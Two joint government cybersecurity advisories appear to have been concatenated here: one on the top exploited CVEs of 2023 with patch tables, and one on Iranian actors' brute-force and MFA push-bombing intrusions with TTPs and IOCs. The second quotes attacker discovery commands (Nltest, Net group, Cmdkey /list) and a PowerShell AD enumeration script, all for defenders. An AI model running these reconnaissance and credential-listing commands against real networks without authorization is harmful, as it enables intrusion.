The following cybersecurity agencies coauthored this joint Cybersecurity Advisory (hereafter collectively referred to as the authoring agencies):
This advisory provides details, collected and compiled by the authoring agencies, on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2023 and their associated Common Weakness Enumerations (CWEs). Malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks in 2023 compared to 2022, allowing them to conduct operations against high priority targets.
The authoring agencies strongly encourage vendors, designers, developers, and end-user organizations to implement the following recommendations, and those found within the Mitigations section of this advisory, to reduce the risk of compromise by malicious cyber actors.
The authoring agencies developed this document in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.
Download the PDF version of this report:
In 2023, malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks compared to 2022, allowing them to conduct cyber operations against higher-priority targets. In 2023, the majority of the most frequently exploited vulnerabilities were initially exploited as a zero-day, which is an increase from 2022, when less than half of the top exploited vulnerabilities were exploited as a zero-day.
Malicious cyber actors continue to have the most success exploiting vulnerabilities within two years after public disclosure of the vulnerability. The utility of these vulnerabilities declines over time as more systems are patched or replaced. Malicious cyber actors find less utility from zero-day exploits when international cybersecurity efforts reduce the lifespan of zero-day vulnerabilities.
Implementing security-centered product development lifecycles. Software developers deploying patches to fix software vulnerabilities is often a lengthy and expensive process, particularly for zero-days. The use of more robust testing environments and implementing threat modeling throughout the product development lifecycle will likely reduce overall product vulnerabilities.
Increasing incentives for responsible vulnerability disclosure. Global efforts to reduce barriers to responsible vulnerability disclosure could restrict the utility of zero-day exploits used by malicious cyber actors. For example, instituting vulnerability reporting bug bounty programs that allow researchers to receive compensation and recognition for their contributions to vulnerability research may boost disclosures.
Using sophisticated endpoint detection and response (EDR) tools. End users leveraging EDR solutions may improve the detection rate of zero-day exploits. Most zero-day exploits, including at least three of the top 15 vulnerabilities from last year, have been discovered when an end user or EDR system reports suspicious activity or unusual device malfunctions.
Top Routinely Exploited Vulnerabilities
Listed in Table 1 are the top 15 vulnerabilities the authoring agencies observed malicious cyber actors routinely exploiting in 2023 with details also discussed below.
The authoring agencies identified other vulnerabilities, listed in Table 2, that malicious cyber actors also routinely exploited in 2023—in addition to the 15 vulnerabilities listed in Table 1.
The authoring agencies recommend vendors and developers take the following steps to help ensure their products are secure by design and default:
For more information on designing secure by design and default products, including additional recommended secure by default configurations, see CISA’s joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security by Design and Default.
The authoring agencies recommend end-user organizations implement the mitigations below to improve their cybersecurity posture based on threat actors’ activity. These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on CPGs, including additional recommended baseline protections.
U.S. organizations: All organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s CyWatch at (855) 292-3937 or CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov.
Australian organizations: Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.
Canadian organizations: Report incidents by emailing CCCS at contact@cyber.gc.ca.
New Zealand organizations: Report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654.
United Kingdom organizations: Report a significant cyber security incident at gov.uk/report-cyber (monitored 24 hours).
The information in this report is being provided “as is” for informational purposes only. CISA, FBI, NSA, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.
November 12, 2024: Initial version.
Appendix: Patch Information and Additional Resources for Top Exploited Vulnerabilities
CVE | Vendor | Affected Products and Versions | Patch Information | Resources |
---|---|---|---|---|
CVE-2023-3519 | Citrix |
NetScaler ADC and NetScaler Gateway: 13.1 before 13.1-49.13 13.0 before 13.0-91.13 NetScaler ADC: 13.1-FIPS before 13.1-37.159 12.1-FIPS before 12.1-55.297 12.1-NDcPP before 12.1-55.297 |
Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-3519, CVE-2023-3466, CVE-2023-3467 |
Threat Actors Exploiting Citrix CVE-2023-3519 to Implant Webshells Critical Security Update for NetScaler ADC and NetScaler Gateway |
CVE-2023-4966 | Citrix |
NetScaler ADC and NetScaler Gateway: 14.1 before 14.1-8.50 13.1 before 13.1-49.15 13.0 before 13.0-92.19 NetScaler ADC: 13.1-FIPS before 13.1-37.164 12.1-FIPS before 12.1-55.300 12.1-NDcPP before 12.1-55.300 |
NetScaler ADC and NetScaler Gateway Security Bulletin for CVE-2023-4966 and CVE-2023-4967 |
#StopRansomware: LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability Critical Security Update for NetScaler ADC and NetScaler Gateway |
CVE-2023-20198 | Cisco | Any Cisco IOS XE Software with web UI feature enabled | Multiple Vulnerabilities in Cisco IOS XE Software Web UI Feature | Guidance for Addressing Cisco IOS XE Web UI Vulnerabilities |
CVE-2023-27997 | Fortinet |
FortiOS-6K7K versions: 7.0.10, 7.0.5, 6.4.12 6.4.10, 6.4.8, 6.4.6, 6.4.2 6.2.9 through 6.2.13 6.2.6 through 6.2.7 6.2.4 6.0.12 through 6.0.16 6.0.10 |
Heap buffer overflow in sslvpn pre-authentication | |
CVE-2023-34362 | Progress |
MOVEit Transfer: 2023.0.0 (15.0) 2022.1.x (14.1) 2022.0.x (14.0) 2021.1.x (13.1) 2021.0.x (13.0) 2020.1.x (12.1) 2020.0.x (12.0) or older MOVEit Cloud |
MOVEit Transfer Critical Vulnerability | #StopRansomware: CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability |
CVE-2023-22515 | Atlassian |
8.0.0, 8.0.1, 8.0.2, 8.0.3, 8.0.4 8.1.0, 8.1.1, 8.1.3, 8.1.4 8.2.0, 8.2.1, 8.2.2, 8.2.38.3.0, 8.3.1, 8.3.2 8.4.0, 8.4.1, 8.4.28.5.0, 8.5.1 |
Broken Access Control Vulnerability in Confluence Data Center and Server | Threat Actors Exploit Atlassian Confluence CVE-2023-22515 for Initial Access to Networks |
(Log4Shell) |
Apache |
Log4j, all versions from 2.0-beta9 to 2.14.1 For other affected vendors and products, see CISA's GitHub repository. |
Apache Log4j Security Vulnerabilities For additional information, see joint advisory: Mitigating Log4Shell and Other Log4j-Related Vulnerabilities |
Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems |
CVE-2023-2868 | Barracuda Networks | 5.1.3.001 through 9.2.0.006 | Barracuda Email Security Gateway Appliance (ESG) Vulnerability | |
CVE-2022-47966 | Zoho | Multiple products, multiple versions. (For more details, see Security advisory for remote code execution vulnerability in multiple ManageEngine products) | Security advisory for remote code execution vulnerability in multiple ManageEngine products | |
CVE-2023-27350 | PaperCut |
PaperCut MF or NG version 8.0 or later (excluding patched versions) on all OS platforms. This includes: version 8.0.0 to 19.2.7 (inclusive) version 20.0.0 to 20.1.6 (inclusive) version 21.0.0 to 21.2.10 (inclusive) version 22.0.0 to 22.0.8 (inclusive) |
URGENT MF/NG vulnerability bulletin (March 2023) | Malicious Actors Exploit CVE-2023-27350 in PaperCut MF and NG |
CVE-2020-1472 | Microsoft | Netlogon | Netlogon Elevation of Privilege Vulnerability | Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure |
CVE-2023-23397 | Microsoft | Outlook | Microsoft Outlook Elevation of Privilege Vulnerability | Russian Cyber Actors Use Compromised Routers to Facilitate Cyber Operations |
CVE-2023-49103 | ownCloud | graphapi | Disclosure of Sensitive Credentials and Configuration in Containerized Deployments | |
CVE-2023-20273 | Cisco | Cisco IOS XE Software with web UI feature enabled | Multiple Vulnerabilities in Cisco IOS XE Software Web UI Feature | Guidance for Addressing Cisco IOS XE Web UI Vulnerabilities |
CVE-2023-42793 | JetBrains | In JetBrains TeamCity before 2023.05.4 | CVE-2023-42793 Vulnerability in TeamCity: Post-Mortem | Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally |
CVE-2023-22518 | Atlassian | All versions of Confluence Data Cetner and Confluence Server | Improper Authorization in Confluence Data Center and Server | |
CVE-2023-29492 | — | — | — | |
CVE-2021-27860 | FatPipe |
WARP, MPVPN, IPVPN 10.1.2 and 10.2.2 |
FatPipe CVE List | |
CVE-2021-40539 | Zoho | ManageEngine ADSelfService Plus builds up to 6113 | Security advisory - ADSelfService Plus authentication bypass vulnerability |
ACSC Alert: Critical vulnerability in ManageEngine ADSelfService Plus exploited by cyber actors |
CVE-2023-0669 | Fortra | GoAnywhere versions 2.3 through 7.1.2 | Fortra deserialization RCE | #StopRansomware: CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability |
CVE-2021-22986 | F5 |
BIG-IP versions: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 and BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2 |
K03009991: iControl REST unauthenticated remote command execution vulnerability CVE-2021-22986 | |
CVE-2019-0708 | Microsoft | Remote Desktop Services | Remote Desktop Services Remote Code Execution Vulnerability | |
CVE-2018-13379 | Fortinet | FortiOS and FortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6 | FortiProxy - system file leak through SSL VPN special crafted HTTP resource requests | |
CVE-2023-35078 | Ivanti |
All supported versions of Endpoint Manager Mobile (EPMM), including: Version 11.4 releases 11.10, 11.9 and 11.8 |
CVE-2023-35078 - New Ivanti EPMM Vulnerability | Threat Actors Exploiting Ivanti EPMM Vulnerabilities |
CVE-2023-35081 | Ivanti | All supported versions of Endpoint Manager Mobile (EPMM), including 11.10, 11.9 and 11.8 | CVE-2023-35081 - Remote Arbitrary File Write | Threat Actors Exploiting Ivanti EPMM Vulnerabilities |
CVE-2023-36844 | Juniper |
Juniper Networks Junos OS on SRX Series and EX Series: All versions prior to 20.4R3-S9; 21.1 version 21.1R1 and later versions; 21.2 versions prior to 21.2R3-S7; 21.3 versions prior to 21.3R3-S5; 21.4 versions prior to 21.4R3-S5; 22.1 versions prior to 22.1R3-S4; 22.2 versions prior to 22.2R3-S2; 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; 22.4 versions prior to 22.4R2-S1, 22.4R3; 23.2 versions prior to 23.2R1-S1, 23.2R2. |
2023-08 Out-of-Cycle Security Bulletin: Junos OS: SRX Series and EX Series: Multiple vulnerabilities in J-Web can be combined to allow a preAuth Remote Code Execution | |
CVE-2023-36845 | Juniper |
Juniper Networks Junos OS on SRX Series and EX Series: All versions prior to 20.4R3-S9; 21.1 version 21.1R1 and later versions; 21.2 versions prior to 21.2R3-S7; 21.3 versions prior to 21.3R3-S5; 21.4 versions prior to 21.4R3-S5; 22.1 versions prior to 22.1R3-S4; 22.2 versions prior to 22.2R3-S2; 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; 22.4 versions prior to 22.4R2-S1, 22.4R3; 23.2 versions prior to 23.2R1-S1, 23.2R2. |
2023-08 Out-of-Cycle Security Bulletin: Junos OS: SRX Series and EX Series: Multiple vulnerabilities in J-Web can be combined to allow a preAuth Remote Code Execution | |
CVE-2023-36846 | Juniper |
Juniper Networks Junos OS on SRX Series and EX Series: All versions prior to 20.4R3-S9; 21.1 version 21.1R1 and later versions; 21.2 versions prior to 21.2R3-S7; 21.3 versions prior to 21.3R3-S5; 21.4 versions prior to 21.4R3-S5; 22.1 versions prior to 22.1R3-S4; 22.2 versions prior to 22.2R3-S2; 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; 22.4 versions prior to 22.4R2-S1, 22.4R3; 23.2 versions prior to 23.2R1-S1, 23.2R2. |
2023-08 Out-of-Cycle Security Bulletin: Junos OS: SRX Series and EX Series: Multiple vulnerabilities in J-Web can be combined to allow a preAuth Remote Code Execution | |
CVE-2023-36847 | Juniper |
Juniper Networks Junos OS on SRX Series and EX Series: All versions prior to 20.4R3-S9; 21.1 version 21.1R1 and later versions; 21.2 versions prior to 21.2R3-S7; 21.3 versions prior to 21.3R3-S5; 21.4 versions prior to 21.4R3-S5; 22.1 versions prior to 22.1R3-S4; 22.2 versions prior to 22.2R3-S2; 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; 22.4 versions prior to 22.4R2-S1, 22.4R3; 23.2 versions prior to 23.2R1-S1, 23.2R2. |
2023-08 Out-of-Cycle Security Bulletin: Junos OS: SRX Series and EX Series: Multiple vulnerabilities in J-Web can be combined to allow a preAuth Remote Code Execution | |
CVE-2023-41064 | Apple |
Versions prior to: iOS 16.6.1 and iPadOS 16.6.1, macOS Monterey 12.6.9, macOS Ventura 13.5.2, iOS 15.7.9 and iPadOS 15.7.9, macOS Big Sur 11.7.10 |
About the security content of iOS 16.6.1 and iPadOS 16.6.1 About the security content of macOS Ventura 13.5.2 About the security content of iOS 15.7.9 and iPadOS 15.7.9 |
|
CVE-2023-41061 | Apple | Versions prior to: watchOS 9.6.2, iOS 16.6.1 and iPadOS 16.6.1 |
||
CVE-2021-22205 | GitLab | All versions starting from 11.9 | RCE when removing metadata with ExifTool | |
CVE-2019-11510 | Ivanti | Pulse Secure Pulse Connect Secure versions, 9.0R1 to 9.0R3.3, 8.3R1 to 8.3R7, and 8.2R1 to 8.2R12 | SA44101 - 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX | |
CVE-2023-6448 | Unitronics |
VisiLogic versions before 9.9.00 |
Unitronics Cybersecurity Advisory 2023-001: Default administrative password | |
CVE-2017-6742 | Cisco | Simple Network Management Protocol subsystem of Cisco IOS 12.0 through 12.4 and 15.0 through 15.6 and IOS XE 2.2 through 3.17 | SNMP Remote Code Execution Vulnerabilities in Cisco IOS and IOS XE Software | |
CVE-2021-4034 | Red Hat |
Red Hat Enterprise Linux 6 Red Hat Enterprise Linux 7 Red Hat Enterprise Linux 8 Red Hat Virtualization 4 Any Red Hat product supported on Red Hat Enterprise Linux (including RHEL CoreOS) is also potentially impacted. |
RHSB-2022-001 Polkit Privilege Escalation - (CVE-2021-4034) | Joint CSA: Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure |
CVE-2021-26084 | Atlassian | Confluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. | Jira Atlassian: Confluence Server Webwork OGNL injection - CVE-2021-26084 | Joint CSA: Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure |
CVE-2021-33044 | Dahua | Various products | — | Joint CSA: Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure |
CVE-2021-33045 | Dahua | Various products | — | Joint CSA: Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure |
CVE-2022-3236 | Sophos | Sophos Firewall v19.0 MR1 (19.0.1) and older | Resolved RCE in Sophos Firewall (CVE-2022-3236) | Joint CSA: Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure |
CVE-2022-26134 | Atlassian | Confluence Server and Data Center, versions: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 | Confluence Security Advisory 2022-06-02 | Joint CSA: Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure |
CVE-2022-41040 | Microsoft | Microsoft Exchange servers | Microsoft Exchange Server Elevation of Privilege Vulnerability | |
CVE-2023-38831 | RARLAB | WinRAR Versions prior to 6.23 Beta 1 | WinRAR 6.23 Beta 1 Released | |
CVE-2019-18935 | Progress Telerik | Telerik.Web.UI.dll versions: |
Allows JavaScriptSerializer Deserialization | Threat Actors Exploit Progress Telerik Vulnerabilities in Multiple U.S. Government IIS Servers |
CVE-2021-34473 | Microsoft |
Exchange Server, Multiple Versions: Q1 2011 (2011.1.315) to R2 2017 SP1 (2017.2.621) R2 2017 SP2 (2017.2.711) to R3 2019 (2019.3.917) R3 2019 SP1 (2019.3.1023) R1 2020 (2020.1.114) and later |
Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473 | Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities |
CISA encourages users and administrators to review the following and apply necessary updates:
]]>The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), the Communications Security Establishment Canada (CSE), the Australian Federal Police (AFP), and Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC) are releasing this joint Cybersecurity Advisory to warn network defenders of Iranian cyber actors’ use of brute force and other techniques to compromise organizations across multiple critical infrastructure sectors, including the healthcare and public health (HPH), government, information technology, engineering, and energy sectors. The actors likely aim to obtain credentials and information describing the victim’s network that can then be sold to enable access to cybercriminals.
Since October 2023, Iranian actors have used brute force, such as password spraying, and multifactor authentication (MFA) ‘push bombing’ to compromise user accounts and obtain access to organizations. The actors frequently modified MFA registrations, enabling persistent access. The actors performed discovery on the compromised networks to obtain additional credentials and identify other information that could be used to gain additional points of access. The authoring agencies assess the Iranian actors sell this information on cybercriminal forums to actors who may use the information to conduct additional malicious activity.
This advisory provides the actors’ tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs). The information is derived from FBI engagements with entities impacted by this malicious activity.
The authoring agencies recommend critical infrastructure organizations follow the guidance provided in the Mitigations section. At a minimum, organizations should ensure all accounts use strong passwords and register a second form of authentication.
Download the PDF version of this report:
For a downloadable list of IOCs, see:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section in Appendix A for a table of the actors’ activity mapped to MITRE ATT&CK tactics and techniques.
The actors likely conduct reconnaissance operations to gather victim identity [T1589] information. Once obtained, the actors gain persistent access to victim networks frequently via brute force [T1110]. After gaining access, the actors use a variety of techniques to further gather credentials, escalate privileges, and gain information about the entity’s systems and network. The actors also move laterally and download information that could assist other actors with access and exploitation.
The actors use valid user and group email accounts [T1078], frequently obtained via brute force such as password spraying [T1110.003] although other times via unknown methods, to obtain initial access to Microsoft 365, Azure [T1078.004], and Citrix systems [T1133]. In some cases where push notification-based MFA was enabled, the actors send MFA requests to legitimate users seeking acceptance of the request. This technique—bombarding users with mobile phone push notifications until the user either approves the request by accident or stops the notifications— is known as “MFA fatigue” or “push bombing” [T1621].
Once the threat actors gain access to an account, they frequently register their devices with MFA to protect their access to the environment via the valid account:
The actors frequently conduct their activity using a virtual private network (VPN) service [T1572]. Several of the IP addresses in the actors’ malicious activity originate from exit nodes tied to the Private Internet Access VPN service.
The actors use Remote Desktop Protocol (RDP) for lateral movement [T1021.001]. In one instance, the actors used Microsoft Word to open PowerShell to launch the RDP binary mstsc.exe
[T1202].
The actors likely use open-source tools and methodologies to gather more credentials. The actors performed Kerberos Service Principal Name (SPN) enumeration of several service accounts and received Kerberos tickets [T1558.003]. In one instance, the actors used the Active Directory (AD) Microsoft Graph Application Program Interface (API) PowerShell application likely to perform a directory dump of all AD accounts. Also, the actors imported the tool [T1105] DomainPasswordSpray.ps1
, which is openly available on GitHub [T1588.002], likely to conduct password spraying. The actors also used the command Cmdkey /list
, likely to display usernames and credentials [T1555].
In one instance, the actors attempted impersonation of the domain controller, likely by exploiting Microsoft’s Netlogon (also known as ”Zerologon”) privilege escalation vulnerability (CVE-2020-1472) [T1068].
The actors leverage living off the land (LOTL) to gain knowledge about the target systems and internal networks. The actors used the following Windows command-line tools to gather information about domain controllers [T1018], trusted domains [T1482], lists of domain administrators, and enterprise administrators [T1087.002] [T1069.002] [T1069.003]:
Nltest /dclist
Nltest /domain_trusts
Nltest /domain_trusts
/all_trusts
Net group “Enterprise admins” /domain
Net group “Domain admins” /domain
Next, the actors used the following Lightweight Directory Access Protocol (LDAP) query in PowerShell [T1059.001]to search the AD for computer display names, operating systems, descriptions, and distinguished names [T1082].
$i=0
$D= [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$L='LDAP://' . $D
$D = [ADSI]$L
$Date = $((Get-Date).AddDays(-90).ToFileTime())
$str = '(&(objectcategory=computer)(operatingSystem=*serv*)(|(lastlogon>='+$Date+')(lastlogontimestamp>='+$Date+')))'
$s = [adsisearcher]$str
$s.searchRoot = $L.$D.distinguishedName
$s.PropertiesToLoad.Add('cn') > $Null
$s.PropertiesToLoad.Add('operatingsystem') > $Null
$s.PropertiesToLoad.Add('description') > $Null
$s.PropertiesToLoad.Add('distinguishedName') > $Null
Foreach ($CA in $s.FindAll()) {
Write-Host $CA.Properties.Item('cn')
$CA.Properties.Item('operatingsystem')
$CA. Properties.Item('description')
$CA.Properties.Item('distinguishedName')
$i++
}
Write-host Total servers: $i
On one occasion, using msedge.exe, the actors likely made outbound connections to Cobalt Strike Beacon command and control (C2) infrastructure [T1071.001].
In a couple instances, while logged in to victim accounts, the actors downloaded files related to gaining remote access to the organization and to the organization’s inventory [T1005], likely exfiltrating the files to further persist in the victim network or to sell the information online.
To detect brute force activity, the authoring agencies recommend reviewing authentication logs for system and application login failures of valid accounts and looking for multiple, failed authentication attempts across all accounts.
To detect the use of compromised credentials in combination with virtual infrastructure, the authoring agencies recommend the following steps:
ntds.dit
file from a domain controller.The authoring agencies recommend organizations implement the mitigations below to improve organizations’ cybersecurity posture based on the actors’ TTPs described in this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA. The CPGs, which are organized to align to the National Institute of Standards and Technology (NIST) Cybersecurity Framework, are a subset of cybersecurity practices, aimed at meaningfully reducing risks to both critical infrastructure operations and the American people. These voluntary CPGs strive to help small- and medium-sized organizations kick-start their cybersecurity efforts by prioritizing investment in a limited number of essential actions with high-impact security outcomes. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
These mitigations apply to critical infrastructure entities across sectors.
The authoring agencies also recommend software manufacturers incorporate secure by design principles and tactics into their software development practices to protect their customers against actors using compromised credentials, thereby strengthening the security posture of their customers. For more information on secure by design, see CISA’s Secure by Design webpage and joint guide.
In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating organization security programs against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
Organizations are encouraged to report suspicious or criminal activity related to information in this advisory to:
The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies.
Intrusion events connected to this Iranian group may also include a different set of cyber actors–likely the third-party actors who purchased access from the Iranian group via cybercriminal forums or other channels. As a result, some TTPs and IOCs noted in this advisory may be tied to these third-party actors, not the Iranian actors. The TTPs and IOCs are in the advisory to provide recipients the most complete picture of malicious activity that may be observed on compromised networks. However, exercise caution if formulating attribution assessments based solely on matching TTPs and IOCs.
October 16, 2024: Initial version.
See Tables 1–12 for all referenced actors’ tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Technique Title | ID | Use |
---|---|---|
Gather Victim Identity Information | T1589 | The actors likely gathered victim information. |
Technique Title | ID | Use |
---|---|---|
Obtain Capabilities: Tool | T1588.002 | The actors obtained a password spray tool through an open-source repository. |
Technique Title | ID | Use |
---|---|---|
Valid Accounts | T1078 | The actors used password spraying to obtain valid user and group email account credentials, allowing them access to the network. |
Valid Accounts: Cloud Accounts | T1078.004 | The actors used accounts hosted on Microsoft 365, Azure, and Okta cloud environments as additional methods for initial access. |
External Remote Services | T1133 | The actors exploited Citrix systems’ external-facing remote services as another method for gaining initial access to the system. |
Technique Title | ID | Use |
---|---|---|
Command and Scripting Interpreter: PowerShell | T1059.001 | The actors used PowerShell commands to maintain and expand access. |
Technique Title | ID | Use |
---|---|---|
Account Manipulation: Device Registration | T1098.005 | The actors used PowerShell commands to maintain and expand access. |
Modify Authentication Process | T1556 | The actors used a public facing Active Directory Federation Service (ADFS) domain to reset the passwords of expired accounts. |
Modify Authentication Process: Multi-Factor Authentication | T1556.006 | The actors used an MFA bypass method, such as Multi-Factor Authentication Request Generation, providing the ability to modify or completely disable MFA defenses. |
Technique Title | ID | Use |
---|---|---|
Exploitation for Privilege Escalation | T1068 | The actors attempted impersonation of the domain controller likely by exploiting CVE-2020-1472, Microsoft’s Netlogon Privilege Escalation vulnerability. |
Domain or Tenant Policy Modification: Trust Modification | T1484.002 | The actors leveraged a public-facing ADFS password reset tool to reactivate inactive accounts, allowing the actor to authenticate and enroll their devices as any user in the AD managed by the victim tenant. |
Technique Title | ID | Use |
---|---|---|
Indirect Command Execution | T1202 | The actors attempted impersonation of the Domain Controller likely by exploiting CVE-2020-1472, Microsoft’s Netlogon Privilege Escalation vulnerability. |
Technique Title | ID | Use |
---|---|---|
Brute Force: Password Spraying | T1110.003 | The actors targeted applications, including Single Sign-on (SSO) Microsoft Office 365, using brute force password sprays and imported the tool DomainPasswordSpray.ps1 . |
Credentials from Password Stores | T1555 | The actors used the command Cmdkey /list likely to display usernames and credentials. |
Steal or Forge Kerberos Tickets: Kerberoasting | T1558.003 | The actors performed Kerberos Service Principal Name (SPN) enumeration of several service accounts and received Rivest Cipher 4 (RC4) tickets. |
Multi-Factor Authentication Request Generation | T1621 | The actors sent MFA requests to legitimate users. |
Technique Title | ID | Use |
---|---|---|
Remote System Discovery | T1018 | The actors used LOTL to return information about domain controllers. |
Permission Groups Discovery: Domain Groups | T1069.002 | The actors used LOTL to return lists of domain administrators and enterprise administrators. |
Permission Groups Discovery: Cloud Groups | T1069.003 | The actors used LOTL to return lists of domain administrators and enterprise administrators. |
System Information Discovery | T1082 | The actors were able to query the AD to discover display names, operating systems, descriptions, and distinguished names from the computer. |
Account Discovery: Domain Account | T1087.002 | The actors used LOTL to return lists of domain administrators and enterprise administrators. |
Domain Trust Discovery | T1482 | The actors used LOTL to return information about trusted domains. |
Technique Title | ID | Use |
---|---|---|
Remote Services: Remote Desktop Protocol | T1021.001 | The actors used Microsoft Word to open PowerShell to launch RDP binary mstsc.exe. |
Technique Title | ID | Use |
---|---|---|
Data from Local System | T1005 | The actors downloaded files related to remote access methods and the organization’s inventory. |
Technique Title | ID | Use |
---|---|---|
Application Layer Protocol: Web Protocols | T1071.001 | The actors used msedge.exe to make outbound connections likely to Cobalt Strike Beacon C2 infrastructure. |
Ingress Tool Transfer | T1105 | The actors imported a tool from GitHub and used it to conduct password spraying. |
Protocol Tunneling | T1572 | The actors frequently conduct targeting using a virtual private network (VPN). |
See Tables 13 to 15 for IOCs obtained from FBI investigations.
Hash | Description |
---|---|
1F96D15B26416B2C7043EE7172357AF3AFBB002A | Associated with malicious activity. |
3D3CDF7CFC881678FEBCAFB26AE423FE5AA4EFEC | Associated with malicious activity. |
Disclaimer: The authoring organizations recommend network defenders investigate or vet IP addresses prior to taking action, such as blocking, as many cyber actors are known to change IP addresses, sometimes daily, and some IP addresses may host valid domains. Many of the IP addresses provided below are assessed VPN nodes and as such are not exclusive to the Iranian actors’ use. The authoring organizations do not recommend blocking these IP addresses based solely on their inclusion in this JCSA. The authoring organizations recommend using the below IP addresses to search for previous activity the actors may have conducted against networks. If positive hits for these IP addresses are identified, the authoring organizations recommend making an independent determination if the observed activity aligns with the TTPs outlined in the JCSA. The timeframes included in the table reflect the timeframe the actors likely used the IPs.
IP Address | Date Range |
---|---|
95.181.234.12 | 01/30/2024 to 02/07/2024 |
95.181.234.25 | 01/30/2024 to 02/07/2024 |
173.239.232.20 | 10/06/2023 to 12/19/2023 |
172.98.71.191 | 10/15/2023 to 11/27/2023 |
102.129.235.127 | 10/21/2023 to 10/22/2023 |
188.126.94.60 | 10/22/2023 to 01/12/2024 |
149.40.50.45 | 10/26/2023 |
181.214.166.59 | 10/26/2023 |
212.102.39.212 | 10/26/2023 |
149.57.16.134 | 10/26/2023 to 10/27/2023 |
149.57.16.137 | 10/26/2023 to 10/27/2023 |
102.129.235.186 | 10/29/2023 to 11/08/2023 |
46.246.8.138 | 10/31/2023 to 01/26/2024 |
149.57.16.160 | 11/08/2023 |
149.57.16.37 | 11/08/2023 |
46.246.8.137 | 11/17/2023 to 01/25/2024 |
212.102.57.29 | 11/19/2023 to 01/17/2024 |
46.246.8.82 | 11/22/2023 to 01/28/2024 |
95.181.234.15 | 11/26/2023 to 02/07/2024 |
45.88.97.225 | 11/27/2023 to 02/11/2024 |
84.239.45.17 | 12/04/2023 to 12/07/2023 |
46.246.8.104 | 12/07/2023 to 02/07/2024 |
37.46.113.206 | 12/07/2023 |
46.246.3.186 | 12/07/2023 to 12/09/2023 |
46.246.8.141 | 12/07/2023 to 02/10/2024 |
46.246.8.17 | 12/09/2023 to 01/09/2024 |
37.19.197.182 | 12/15/2023 |
154.16.192.38 | 12/25/2023 to 01/24/2024 |
102.165.16.127 | 12/27/2023 to 01/28/2024 |
